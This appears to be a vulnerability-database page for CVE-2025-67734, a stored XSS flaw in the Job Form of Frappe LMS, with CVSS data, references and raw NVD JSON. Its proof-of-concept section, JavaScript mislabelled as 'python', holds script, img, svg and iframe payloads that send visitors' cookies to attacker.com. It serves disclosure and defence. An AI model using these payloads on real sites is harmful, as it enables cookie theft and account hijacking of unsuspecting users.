CVE-2025-67734

Description

Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allowed authenticated attackers to enter JavaScript through the Company Website field of the Job Form, exposing users to an XSS attack. The script could then be executed in the browsers of users who opened the malicious job posting. This issue is fixed in version 2.42.0.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:* - VULNERABLE

Frappe LMS < 2.42.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-67734 Stored XSS PoC // Target: Frappe LMS Job Form // Attack Vector: Company Website field injection // Step 1: Authenticate with low-privilege account const credentials = { usr: '[email protected]', password: 'password123' }; // Step 2: Submit Job Form with XSS payload in Company Website field const jobFormPayload = { job_title: 'Software Engineer', company_name: 'Legitimate Company', company_website: '<script>\n fetch("https://attacker.com/steal?cookie=" + document.cookie)\n</script>', job_description: 'Job description here', job_type: 'full-time' }; // Step 3: When victim views the job posting, XSS executes // Payload steals victim cookies and sends to attacker server // Alternative payloads: // <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> // <svg onload="fetch('https://attacker.com/steal?cookie='+document.cookie)"> // <iframe src="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67734
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67734
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67734/
[4] VulDB https://vuldb.com/cve/CVE-2025-67734
[5] https://github.com/frappe/lms/commit/ca849da81558066d7614b9b6234004ff59c90632
[6] https://github.com/frappe/lms/security/advisories/GHSA-c495-qg4v-5vr7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67734", "sourceIdentifier": "[email protected]", "published": "2025-12-12T20:15:42.623", "lastModified": "2025-12-16T21:34:55.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allowed authenticated attackers to enter JavaScript through the Company Website field of the Job Form, exposing users to an XSS attack. The script could then be executed in the browsers of users who opened the malicious job posting. This issue is fixed in version 2.42.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.42.0", "matchCriteriaId": "E8908A38-7B64-4B77-9423-86532826C317"}]}]}], "references": [{"url": "https://github.com/frappe/lms/commit/ca849da81558066d7614b9b6234004ff59c90632", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/frappe/lms/security/advisories/GHSA-c495-qg4v-5vr7", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}